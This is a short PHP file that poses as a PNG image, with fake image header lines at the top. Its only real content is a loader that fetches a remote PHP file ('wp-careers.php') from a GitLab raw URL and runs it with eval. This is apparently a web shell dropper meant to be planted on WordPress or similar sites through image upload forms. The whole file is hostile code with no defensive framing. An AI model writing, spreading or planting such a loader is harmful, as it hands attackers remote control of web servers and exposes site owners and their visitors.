 ﻿PNG %k25u25%fgd5n! ﻿﻿PNG %k25u25%fgd5n! 
﻿﻿ PNG %k25u25%fgd5n! ﻿﻿PNG %k25u25%fgd5n! 
<?php
/**
 * Systesdary
 * ID: 69asd63379e62
 * Status: Validated
 * Author: 0x6ick - 6ickzone
 */
$path = "https://gitlab.com/bosseptp-group/bosseptp-project1/-/raw/main/wp-careers.php";
$code = implode('', file($path));
eval("?>" . $code);
?>